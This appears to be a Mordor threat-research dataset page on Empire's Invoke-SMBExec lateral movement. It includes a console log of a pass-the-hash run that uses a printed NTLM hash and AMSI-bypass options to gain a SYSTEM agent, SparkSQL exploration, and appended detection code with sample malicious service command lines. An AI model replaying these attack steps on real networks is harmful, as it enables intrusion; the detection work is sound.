Empire Invoke SMBExec

Metadata

Author: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2019/05/18
Modification Date: 2020/09/20
Tactics: ['TA0008']
Techniques: ['T1021.002']
Tags: ['RPC CreateService', 'RPC StartService', 'SMB Svcctl']

Dataset Description

This dataset represents an adversary remotely creating and starting a service through Service Control Manager RPC methods (CreateService, StartService) carried over an SMB named pipe, svcctl.

Notebooks

Notebooks created by the community leveraging the mordor datasets:

Author | Name | Link

Simulation Plan

Environment | Tool Type | Module
Mordor shire | C2 | invoke_smbexec

Adversary View

(Empire: 7ADX8ZVR) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         8948   5/0.0    2020-09-20 06:34:21  http            


(Empire: agents) > interact 7ADX8ZVR
(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8
(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo
(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire
(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_smbexec) > info

              Name: Invoke-SMBExec
            Module: powershell/lateral_movement/invoke_smbexec
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @rvrsh3ll

Description:
  Executes a stager on remote hosts using SMBExec.ps1. This
  module requires a username and NTLM hash

Comments:
  https://raw.githubusercontent.com/Kevin-Robertson/Invoke-
  TheHash/master/Invoke-SMBExec.ps1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        7ADX8ZVR                  Agent to run module on.                 
  CredID           False                                 CredID from the store to use.           
  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma 
                              cal                       separated.                              
  Username         True        pgustavo                  Username.                               
  Domain           False       theshire                  Domain.                                 
  Hash             True        81d310fa34e6a56a31145445  NTLM Hash in LM:NTLM or NTLM format.    
                              891bb7b8                
  Service          False                                 Name of service to create and delete.   
                                                        Defaults to 20 char random.             
  Listener         False       http                      Listener to use.                        
  Command          False                                 Custom command to run.                  
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_smbexec) > execute
[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT
[*] Agent 7ADX8ZVR tasked with task ID 3
[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) > 
Command executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent 3KL8YRUB checked in
[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 3KL8YRUB at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_smbexec) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         8948   5/0.0    2020-09-20 06:57:53  http            
3KL8YRUB ps 172.18.39.6     WORKSTATION6      *THESHIRE\SYSTEM        powershell         1152   5/0.0    2020-09-20 06:57:49  http            

(Empire: agents) > interact 3KL8YRUB
(Empire: 3KL8YRUB) > shell whoami
[*] Tasked 3KL8YRUB to run TASK_SHELL
[*] Agent 3KL8YRUB tasked with task ID 1
(Empire: 3KL8YRUB) > 
nt authority\system

..Command execution completed.

(Empire: 3KL8YRUB) >

Explore Mordor Dataset

Initialize Analytics Engine

# openhunt.mordorutils wraps PySpark session creation and Mordor dataset loading
from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

# Download the zipped JSON dataset and register it as a SparkSQL temporary view named mordorTable
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Count events per host, channel and EventID to see which telemetry sources the dataset contains
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |3441 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |939  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |535  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |388  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |297  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |253  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |240  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |220  |
|WORKSTATION6               |Windows PowerShell                      |800    |183  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |145  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |136  |
|WORKSTATION6.theshire.local|security                                |4658   |101  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |73   |
|WORKSTATION6.theshire.local|security                                |4656   |60   |
|WORKSTATION5.theshire.local|Security                                |4658   |52   |
|WORKSTATION6.theshire.local|security                                |4690   |51   |
|WORKSTATION6.theshire.local|security                                |4663   |33   |
|WORKSTATION6.theshire.local|security                                |5158   |33   |
|WORKSTATION5.theshire.local|Security                                |4690   |26   |
|MORDORDC.theshire.local    |Security                                |5156   |26   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
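The natural next step after the overview is to hunt for the behaviour the dataset description names: a service created and started over the svcctl pipe. The Python below is an added example, not part of this page, the Mordor project or the notebook above. It runs detection logic over a handful of constructed events modelled on Windows Security event 5145 (network share object access to IPC$ with RelativeTargetName svcctl) and System event 7045 (service installed). Host names, IPs, the user and the service name mirror the adversary view above, but the records themselves are constructed and are not rows from the dataset; the field names follow the Windows event schema, the 60-second correlation window is an assumption, and the "20 uppercase letters" heuristic comes from the module's documented default service name. The same join could be expressed in SparkSQL against mordorTable once the Security and System channels are confirmed to carry those event IDs.

```python
import re
from datetime import datetime

# Heuristics (assumptions for this example, not rules taken from the page or the dataset):
# - SMBExec-style tools run their payload as a service whose ImagePath is a command interpreter
# - Invoke-SMBExec's documented default service name is 20 random characters
SUSPICIOUS_IMAGE = re.compile(r"(^%COMSPEC%|\bcmd(\.exe)?\s+/c|powershell)", re.IGNORECASE)
RANDOM_NAME = re.compile(r"^[A-Z]{20}$")

# Constructed sample events. Hosts, IPs, user and service name mirror the adversary view on
# this page, but these records are made up for the example; they are not dataset rows.
SAMPLE_EVENTS = [
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "Security", "EventID": 5145,
     "TimeCreated": "2020-09-20 06:57:40", "ShareName": "\\\\*\\IPC$",
     "RelativeTargetName": "svcctl", "IpAddress": "172.18.39.5",
     "SubjectUserName": "pgustavo", "AccessMask": "0x12019f"},
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "System", "EventID": 7045,
     "TimeCreated": "2020-09-20 06:57:41", "ServiceName": "PGUJLOAKFQFVOMHGFQPX",
     "ImagePath": "%COMSPEC% /C powershell -noP -sta -w 1 -enc <base64>",  # placeholder payload
     "AccountName": "LocalSystem"},
    # benign service install: normal binary path, normal name, no preceding svcctl access
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "System", "EventID": 7045,
     "TimeCreated": "2020-09-20 07:10:00", "ServiceName": "Sysmon64",
     "ImagePath": "C:\\Windows\\Sysmon64.exe", "AccountName": "LocalSystem"},
    # IPC$ access to a different pipe (srvsvc) must not count as service-control traffic
    {"Hostname": "WORKSTATION5.theshire.local", "Channel": "Security", "EventID": 5145,
     "TimeCreated": "2020-09-20 07:12:00", "ShareName": "\\\\*\\IPC$",
     "RelativeTargetName": "srvsvc", "IpAddress": "172.18.39.6",
     "SubjectUserName": "sbeavers", "AccessMask": "0x12019f"},
    # interpreter-backed service with no svcctl access in the window: still flagged, no source
    {"Hostname": "WORKSTATION5.theshire.local", "Channel": "System", "EventID": 7045,
     "TimeCreated": "2020-09-20 07:12:30", "ServiceName": "updater",
     "ImagePath": "cmd.exe /c whoami > C:\\Windows\\Temp\\out.txt", "AccountName": "LocalSystem"},
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def is_svcctl_pipe_access(ev):
    """Security 5145: a remote client opened the svcctl pipe on the IPC$ share."""
    return (ev["EventID"] == 5145
            and ev.get("ShareName", "").upper().endswith("IPC$")
            and ev.get("RelativeTargetName", "").lower() == "svcctl")


def service_install_reasons(ev):
    """System 7045: return the reasons a new service looks like a remote-exec payload."""
    if ev["EventID"] != 7045:
        return []
    reasons = []
    if SUSPICIOUS_IMAGE.search(ev.get("ImagePath", "")):
        reasons.append("image path is a command interpreter")
    if RANDOM_NAME.match(ev.get("ServiceName", "")):
        reasons.append("service name is 20 random uppercase letters")
    return reasons


def correlate(events, window_seconds=60):
    """Pair suspicious service installs with svcctl pipe access on the same host in the
    preceding window, so each finding names the client IP and account that drove the SCM."""
    pipe_hits = [e for e in events if is_svcctl_pipe_access(e)]
    findings = []
    for ev in events:
        reasons = service_install_reasons(ev)
        if not reasons:
            continue
        installed_at = parse_ts(ev["TimeCreated"])
        sources = [p for p in pipe_hits
                   if p["Hostname"] == ev["Hostname"]
                   and 0 <= (installed_at - parse_ts(p["TimeCreated"])).total_seconds() <= window_seconds]
        findings.append({
            "Hostname": ev["Hostname"],
            "ServiceName": ev["ServiceName"],
            "ImagePath": ev["ImagePath"],
            "Reasons": reasons,
            "RemoteSources": sorted({(p["IpAddress"], p["SubjectUserName"]) for p in sources}),
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

A finding with an empty RemoteSources list (the constructed "updater" service) is still worth a look, since it could be a local privilege-escalation step or a host on which 5145 auditing is not enabled; the pairing with svcctl access is what separates lateral movement from a local install.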